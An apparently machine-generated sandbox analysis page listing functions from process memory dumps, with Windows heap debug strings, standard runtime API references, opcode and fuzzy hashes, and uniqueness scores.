
API ID:
String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-3744532478
Opcode ID: 48222886a932168e877b4e5d4f7f0abeffb0a40ced8f7808e983875a0cc3aaa1
Instruction ID: 079ef066ac556ebbc8deddb5e67cc7623f9a956cf2f7e21dbdd3f88de584eaf2
Opcode Fuzzy Hash: 48222886a932168e877b4e5d4f7f0abeffb0a40ced8f7808e983875a0cc3aaa1
Instruction Fuzzy Hash: F0C11231500242EFEB26EF68C944BAABBF9FF08714F048148F98697691D774E890DF64

Uniqueness

Uniqueness Score: 100.00%

Function 025EE5BF, Relevance: 8.1, Strings: 6, Instructions: 602COMMON

Download Yara Rule

Strings

((LONG)FreeEntry->Size > 1), xrefs: 02649A62
HEAP[%wZ]: , xrefs: 02649948, 026499B4, 02649A4A, 02649B48
(LONG)FreeEntry->Size > 1, xrefs: 02649B60
(!TrailingUCR), xrefs: 02649C04
HEAP: , xrefs: 02649955, 02649A57, 02649B55, 02649BF9
(UCRBlock != NULL), xrefs: 02649960

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 0797c10d722f96ec02b7d1650e8f118fc5e9cb1f0db55fabf550a9e61e3e6e04
Instruction ID: 14905b41d6759ad049e7a4f1caade2757b364dc779d2be1bf73c7a552d9c4da9
Opcode Fuzzy Hash: 0797c10d722f96ec02b7d1650e8f118fc5e9cb1f0db55fabf550a9e61e3e6e04
Instruction Fuzzy Hash: CA320531600646EFDB25DF68C880BAABBF6FF44314F148549E85A9B681DB70EA81CB54

Uniqueness

Uniqueness Score: 0.05%

Function 00FB16B6, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00FB1CC7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FB1CDC
UnhandledExceptionFilter.KERNEL32(00FB71B8), ref: 00FB1CE7
GetCurrentProcess.KERNEL32(C0000409), ref: 00FB1D03
TerminateProcess.KERNEL32(00000000), ref: 00FB1D0A

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8067e8acf8d5f28ff14c9dd01b3e1690e1604e806d02472639c8775f871fa32e
Instruction ID: 0a0bdf26ca1cbe02d1458b8c63fc97b90991bfa8eb09ba5486cede4e1c9bb9fd
Opcode Fuzzy Hash: 8067e8acf8d5f28ff14c9dd01b3e1690e1604e806d02472639c8775f871fa32e
Instruction Fuzzy Hash: F621F4B4D0432ADFD7A0EF29F8856447BE4FB48340F00415AE4A8E7398D77A5581DF65

Uniqueness

Uniqueness Score: 0.02%

Function 026168DA, Relevance: 5.1, Strings: 3, Instructions: 1399UNIQUE

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0264A2FF
HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 0264A320
HEAP: , xrefs: 0264A30C

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
API String ID: 0-2419525547
Opcode ID: e67a79eb87986c475fc3aee48258c33a8e25f1cf9680f2afd99dbd6b8316937e
Instruction ID: 1867244d1485f155c12398e606e9322c6776b6c8477fae68050b3490f4492606
Opcode Fuzzy Hash: e67a79eb87986c475fc3aee48258c33a8e25f1cf9680f2afd99dbd6b8316937e
Instruction Fuzzy Hash: 6EC28C75A00256CFCB29CF19C494A7A7BB2FF94314B19C1A9EC9A9B395D730EC41CB90

Uniqueness

Uniqueness Score: 100.00%

Function 02630301, Relevance: 4.6, Strings: 3, Instructions: 859UNIQUE

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0264E670
HEAP: , xrefs: 0264E67D
Unable to release memory at %p for %p bytes - Status == %x, xrefs: 0264E691

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
API String ID: 0-212623055
Opcode ID: eb9e0dc713fd858414dc8048a660bea574c1039ca6b5452d1d946fd24c6d48c6
Instruction ID: b6fcb1a5b96e6827218d9fa4071e9ca98d6866c50638b8f7e4a778dc9484c8f2
Opcode Fuzzy Hash: eb9e0dc713fd858414dc8048a660bea574c1039ca6b5452d1d946fd24c6d48c6
Instruction Fuzzy Hash: 2E72EE71900259DFDB2ACF68C840BBEBBF5BF09314F148459E896AB282D734A945CF64

Uniqueness

Uniqueness Score: 100.00%

Function 02616258, Relevance: 4.6, Strings: 3, Instructions: 850UNIQUE

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 02649DE4, 02649E97, 0264A0BF, 0264A171
HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 02649E05, 02649EB8, 0264A0E0, 0264A192
HEAP: , xrefs: 02649DF1, 02649EA4, 0264A0CC, 0264A17E

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
API String ID: 0-2419525547
Opcode ID: a1b2858056b96c2318e4b58178f0c1baa2376c2757a69755bf7b1506f6db5356
Instruction ID: 802c96a95601d235f1db6ea5b1f78e614d67de69a965a53e04c835f9bc3c32c3
Opcode Fuzzy Hash: a1b2858056b96c2318e4b58178f0c1baa2376c2757a69755bf7b1506f6db5356
Instruction Fuzzy Hash: DE72AF74604216DFDB28CF58C490BBAB7B6FF49314F19819DE88A9B795DB30E841CB90

Uniqueness

Uniqueness Score: 100.00%

Function 025E9203, Relevance: 4.2, Strings: 3, Instructions: 478UNIQUE

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0264E114
HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 0264E135
HEAP: , xrefs: 0264E121

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
API String ID: 0-2419525547
Opcode ID: 5eaf22d818bd369973874ed4e4bcbe5a0f4b0a1f08c8f9e352cc2f6856dbae00
Instruction ID: e9edfea317fcb2f285b9c7a3db4d978cff22668ea67ccd9b42abb3a18a8ed170
Opcode Fuzzy Hash: 5eaf22d818bd369973874ed4e4bcbe5a0f4b0a1f08c8f9e352cc2f6856dbae00
Instruction Fuzzy Hash: BB029C70510246DFCB2CCF68C490ABABBE2BF49304F14899DE8978B282D735E951CB94

Uniqueness

Uniqueness Score: 100.00%

Function 025EC447, Relevance: 4.1, Strings: 3, Instructions: 340UNIQUE

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 026494CD
HEAP: , xrefs: 026494DA
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 026494ED

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
API String ID: 0-385592399
Opcode ID: 125b57752759a0d81aa33b1819e5af30a77c0f8a9428195466494cb3717aeead
Instruction ID: 6cf51adfbe09374f1e961696d2098d5849dcdb1e357add224b04d4b95d0b213d
Opcode Fuzzy Hash: 125b57752759a0d81aa33b1819e5af30a77c0f8a9428195466494cb3717aeead
Instruction Fuzzy Hash: B2D1DF71A00656EFDF28CF69C480BBABBF1BF44309F18859AD5969B681D730ED01CB94

Uniqueness

Uniqueness Score: 100.00%

Function 0262291F, Relevance: 4.0, Strings: 3, Instructions: 272COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 02652466
RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 0265247E
HEAP: , xrefs: 02652473

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
API String ID: 0-1596344177
Opcode ID: f1dd1f376eca05f27db1de1deb62abd3b2f9cac0421df1761a078cd2e79408a4
Instruction ID: 78dac9a22455f06709853a68b2d64225a19987a7b04e4cb2ecf1abaae41edb4a
Opcode Fuzzy Hash: f1dd1f376eca05f27db1de1deb62abd3b2f9cac0421df1761a078cd2e79408a4
Instruction Fuzzy Hash: 9FB17E31600A16DFCB28CF29C494A7AB7F1FF48314B148699E9968F791D730E885CF54

Uniqueness

Uniqueness Score: 0.05%

Function 0261842B, Relevance: 3.2, Strings: 2, Instructions: 731COMMON

Download Yara Rule

Strings

\\.\, xrefs: 026358B2
, xrefs: 026184AB

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $\\.\
API String ID: 0-260595308
Opcode ID: 72c8dfcc539155ddaf0c76870e04f60f5c118e885c996aa5359314fc7109192a
Instruction ID: ba119e333d580ff6ea9f2d99ed8c0a4e976e93b7cc0222ad1221d06e5e7bbf33
Opcode Fuzzy Hash: 72c8dfcc539155ddaf0c76870e04f60f5c118e885c996aa5359314fc7109192a
Instruction Fuzzy Hash: 93527070D04259CFDF29CFA9C4806ADF7B2FF48314F68812AD406AB394E775A886CB54

Uniqueness

Uniqueness Score: 0.12%

Function 025D9679, Relevance: 2.4, Strings: 1, Instructions: 1141COMMON

Download Yara Rule

Strings

, xrefs: 025CF59F

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-3916222277
Opcode ID: 3a450116879c876eaba41a0e53dfcaa91ff32647270beed8f963c5d733c276e9
Instruction ID: 9cec98a794577f91c3dd07de9fbf721074c82fd4b399fc200be387d575ac6f99
Opcode Fuzzy Hash: 3a450116879c876eaba41a0e53dfcaa91ff32647270beed8f963c5d733c276e9
Instruction Fuzzy Hash: E2A23872900269DEEF358F68CC80BE9BBB5BB05304F0445EAE689A7241E7709EC4CF55

Uniqueness

Uniqueness Score: 0.02%

Function 025C83DB, Relevance: 2.0, Strings: 1, Instructions: 745COMMON

Download Yara Rule

Strings

#, xrefs: 0264D16B

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 3da45dcdf4bc5d263f519fc473a3eec8785cccf20434c1406a86805c468826a2
Instruction ID: f84e5c509a729fe52298a61aaed60f0a66911718308b6aa223b043530d9a9215
Opcode Fuzzy Hash: 3da45dcdf4bc5d263f519fc473a3eec8785cccf20434c1406a86805c468826a2
Instruction Fuzzy Hash: E7528871D012199FDF26DFE4C844BEEBBB5FF48704F14402AE942AB290EB749945CBA4

Uniqueness

Uniqueness Score: 0.05%

Function 00FD48FE, Relevance: 1.7, Strings: 1, Instructions: 457UNIQUE

Download Yara Rule

Strings

y%, xrefs: 00FD4B94

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID: y%
API String ID: 0-3629228607
Opcode ID: 972be105c10a7b7daa0fd3331512b75e5ddf28ea6006e2be673ea86ee27f2914
Instruction ID: 8670c5825a55623fc1bda2bf5d8e352f92eaf08ff4a13a4174ac7f4892967195
Opcode Fuzzy Hash: 972be105c10a7b7daa0fd3331512b75e5ddf28ea6006e2be673ea86ee27f2914
Instruction Fuzzy Hash: 3E22A8329087A1CFD712CF38D99AB513FB2F757320B08029EC9A2A7592D734615ADF85

Uniqueness

Uniqueness Score: 100.00%

Function 0261BA1C, Relevance: 1.7, Strings: 1, Instructions: 436COMMON

Download Yara Rule

Strings

8@8, xrefs: 0261BA1E

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 8@8
API String ID: 0-222468769
Opcode ID: cfd2bc600b5f49b6dd3815480d7fd24a7e7664fb37470242cc815f1c5be44c63
Instruction ID: 58fc276b794e32c1a562b8bdd8de181483b5f10e636141d6123e7eca7a219a08
Opcode Fuzzy Hash: cfd2bc600b5f49b6dd3815480d7fd24a7e7664fb37470242cc815f1c5be44c63
Instruction Fuzzy Hash: CFF16E71E00249EFDF15DFA4C880BAEBBB5FF04708F18845AE845AB2A0E775E941CB54

Uniqueness

Uniqueness Score: 0.10%

Function 00FC2422, Relevance: 1.7, Strings: 1, Instructions: 434COMMON

Download Yara Rule

Strings

(, xrefs: 00FC2784

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: bf941ae4b75fd8a538f2c8cd4285bfae9c26b479b71f11fb5d0e9157260cdd3d
Instruction ID: a968ebb4e7a5c46f57d036d21920bfcaed1123be88493977a9798bd8a81c534a
Opcode Fuzzy Hash: bf941ae4b75fd8a538f2c8cd4285bfae9c26b479b71f11fb5d0e9157260cdd3d
Instruction Fuzzy Hash: A1121BB6E006199FDB14CF99D88059DFBF2FF88314F1AC1AAD849A7315D774AA418F80

Uniqueness

Uniqueness Score: 0.02%

Function 00FC2463, Relevance: 1.7, Strings: 1, Instructions: 427COMMON

Download Yara Rule

Strings

(, xrefs: 00FC2784

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 0089290b9806bf1172cfd41c9b0337e1fcf4b0fbd32d11cf3bf8b031f0b4234d
Instruction ID: 5009a86c73488fbfaea10b2464680517a38bc5294e1c849df1b099a156bd9d0f
Opcode Fuzzy Hash: 0089290b9806bf1172cfd41c9b0337e1fcf4b0fbd32d11cf3bf8b031f0b4234d
Instruction Fuzzy Hash: 84022CB6E006199FDB54CF9AC8815DDFBF2FF88314F1AC1AAD849A3315D6746A418F80

Uniqueness

Uniqueness Score: 0.02%

Function 00FC2468, Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 00FC2784

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 12c284204a4fa593dc5911b7e30d1d974c61c46364080783268fad50400983e2
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 5F022DB6E006199FDB54CF9AC8805DDFBF2FF88314F1AC1AAD849A3315D6746A418F80

Uniqueness

Uniqueness Score: 0.02%

Function 025E30C9, Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

@, xrefs: 025E3122

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d583ff79dcf35602fffb38ed2cb79809075ce90817fe2005fe373a8b42949ffd
Instruction ID: 1ed1351e8765c0ce81141efb8070cb6d3baff28833e9e4bea323d04488bbda4b
Opcode Fuzzy Hash: d583ff79dcf35602fffb38ed2cb79809075ce90817fe2005fe373a8b42949ffd
Instruction Fuzzy Hash: 7EA1D1716082197AEF2DDF64CC40BFE7B66BB88318F0444E9E986971C1D774C994CB29

Uniqueness

Uniqueness Score: 0.02%

Function 026260ED, Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

, xrefs: 0262616F

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 56bb21ba0cd169f782a759c368536622145ed2da2b3ac45451176bb8885e31be
Instruction ID: 058d12f8d98c198878169871df5d7bac282d2e9c441f108dab303f4261644a73
Opcode Fuzzy Hash: 56bb21ba0cd169f782a759c368536622145ed2da2b3ac45451176bb8885e31be
Instruction Fuzzy Hash: 6181D033E005259BDF29CE6DC8952BEB761EB4572CF158229D866AB3C4DB30E941CB84

Uniqueness

Uniqueness Score: 0.02%

Function 00FCEB6B, Relevance: 1.3, Strings: 1, Instructions: 55UNIQUE

Download Yara Rule

Strings

;t], xrefs: 00FCEB80

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ;t]
API String ID: 0-3615622461
Opcode ID: 44f2d15a58e9418bb1342dd07c4623bdf59021a850f8669f66deac85cf333a3e
Instruction ID: 6aa7b8de5f3b969a44ff32c23e7a6ca615741bc1fbd7317ea8eda1285c86e7ac
Opcode Fuzzy Hash: 44f2d15a58e9418bb1342dd07c4623bdf59021a850f8669f66deac85cf333a3e
Instruction Fuzzy Hash: AE0199375081658ED3124B2894461F2FF60FE5732039823CEC89083A53C3014853C7D1

Uniqueness

Uniqueness Score: 100.00%

Function 025C7068, Relevance: 1.0, Instructions: 951COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8bce2de47a6a41ddd8b49692fba7af5af3ea2242e5a986dd561a368a743f5d81
Instruction ID: 7011d08196459f6e77e7c1d5020d3ecfa1151aa0910edcca0407be99d0c0b39d
Opcode Fuzzy Hash: 8bce2de47a6a41ddd8b49692fba7af5af3ea2242e5a986dd561a368a743f5d81
Instruction Fuzzy Hash: 7372CD72D002199FDF15CFA8CC85BEEBBB6BF48304F198029E945A7281EB759845CF64

Uniqueness

Uniqueness Score: 0.00%

Function 025CCB67, Relevance: .6, Instructions: 646COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2c360222fbca08fad385e66ae8339dd93087dfd843c1d87f4f85fbaddb23e8
Instruction ID: a482f3a7f48b71efdade7416a00516c7be4a28596fb854e511e43c69c94dc1b3
Opcode Fuzzy Hash: 7d2c360222fbca08fad385e66ae8339dd93087dfd843c1d87f4f85fbaddb23e8
Instruction Fuzzy Hash: A142E6B2808236CBC7144F05C4A00B93BA1FF69756B2A446FEDC65F781EB7489A1E7D4

Uniqueness

Uniqueness Score: 0.00%

Function 026907E8, Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b40117e649d484f89f3e62b4c7deb4d2e5af114c75dc295fa73b5f8239b7b05a
Instruction ID: 9c6630c0223989137acf410ecf17c9f65d48c412a9d17f4f28292741fff7cf29
Opcode Fuzzy Hash: b40117e649d484f89f3e62b4c7deb4d2e5af114c75dc295fa73b5f8239b7b05a
Instruction Fuzzy Hash: F6226871D00218DFDF24CF98C884AEDBBF9FF08314F19816AE849AB291D775A985CB54

Uniqueness

Uniqueness Score: 0.00%

Function 025F3B0A, Relevance: .5, Instructions: 528COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3361833f03a970180a2f44e5d4e4cbb7c01fce4a301e3988e2a118d77bceccc
Instruction ID: 51def3c818f9e0b6b689c9dd3d8113029f21d1d2283950d61b8f5002f2ec8d73
Opcode Fuzzy Hash: a3361833f03a970180a2f44e5d4e4cbb7c01fce4a301e3988e2a118d77bceccc
Instruction Fuzzy Hash: AF029F73D4D7F34B8BB14EB940E06267EA07E0159530F87E8DEC06F29AC21ADD0996E4

Uniqueness

Uniqueness Score: 0.00%

Function 025C44E8, Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af41e7f26c3fc5209a7977925629d128677568b92feba8b822dd20a77fdbc479
Instruction ID: 4dbe571cc259914f2f3a545f069ae7b8d49791ca7eae40a8e81484deec600411
Opcode Fuzzy Hash: af41e7f26c3fc5209a7977925629d128677568b92feba8b822dd20a77fdbc479
Instruction Fuzzy Hash: D012D3B0A14251CFDB29CF29C094B75B7E0BF05708F04899EE8D68B786EB34E955CB64

Uniqueness

Uniqueness Score: 0.00%

Function 00FD4F87, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f082f06a20c28c364bff093599e94df04af6feec0f7feaf9aaf0037b06e4a24
Instruction ID: b40b5125631975638e9a43f70ac079a87f8336671df38f3144eecac7cb0d7aee
Opcode Fuzzy Hash: 3f082f06a20c28c364bff093599e94df04af6feec0f7feaf9aaf0037b06e4a24
Instruction Fuzzy Hash: A722A733909391DFC712CF38D88AB423FB6F756320B08429EC5A297692DB746526DF84

Uniqueness

Uniqueness Score: 0.00%

Function 02630261, Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083129b2745868e05d35fab1cc0f86444c66b20f47bf5059ad1f5d2e27f4122d
Instruction ID: 9d3a1297138f7fb56da73c9133bcffa38d6272f0e4242c9aed4a1bc45660ac75
Opcode Fuzzy Hash: 083129b2745868e05d35fab1cc0f86444c66b20f47bf5059ad1f5d2e27f4122d
Instruction Fuzzy Hash: B7C12470900255EFDB29CF64C494BBBBBE6FF05304F04485EE8C68B681DB36A995DB60

Uniqueness

Uniqueness Score: 0.00%

Function 02617495, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2811ee20751157b6a52c49d828e70407659ae5e14c79262fb8a0a393fd20d31a
Instruction ID: 868875f306404ce33df3e71a9ed55a36bd55544a028e54861a7054b7205a1fa7
Opcode Fuzzy Hash: 2811ee20751157b6a52c49d828e70407659ae5e14c79262fb8a0a393fd20d31a
Instruction Fuzzy Hash: 2B91C075D0029ADACF25DFD4C4506FDB7B1FF50709F98412AD882AB284EF74A882CB54

Uniqueness

Uniqueness Score: 0.00%

Function 025E3944, Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fabe49501a4eef3638c5f79891326962948e323acee452b33c798d2e79cb23f
Instruction ID: 4dcb2598672ada57265c8938bde4828ded3ca283febb53410e33a5db8f1aab29
Opcode Fuzzy Hash: 2fabe49501a4eef3638c5f79891326962948e323acee452b33c798d2e79cb23f
Instruction Fuzzy Hash: C67189356062A29EDB198E2CC4C02BD3B62FB96348F248AB6D883CB289D771D443C755

Uniqueness

Uniqueness Score: 0.00%

Function 0268B4CF, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
Instruction ID: a89aeb026d835aaee32881c5c8109853460c6085c5bf10f4728bf03b25630517
Opcode Fuzzy Hash: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
Instruction Fuzzy Hash: 74915B72520B06CBD725DF29C486666BBE0FF0536CB288B1DD4E6DB6A0C374E552CB00

Uniqueness

Uniqueness Score: 0.00%

Function 00FD5603, Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b477164bc441a3c52505c614fe1b682d3d863025af73930957c31890df5b90
Instruction ID: 5701466411c541851997ebcdd75398076b1d7a189979521b3fc7897f640a4bc2
Opcode Fuzzy Hash: 44b477164bc441a3c52505c614fe1b682d3d863025af73930957c31890df5b90
Instruction Fuzzy Hash: 9E814732948791DFEB06DF38D8AA6423FB1F74673074C078ED5A25B2D2C760106ADB89

Uniqueness

Uniqueness Score: 0.00%

Function 025E0BBB, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

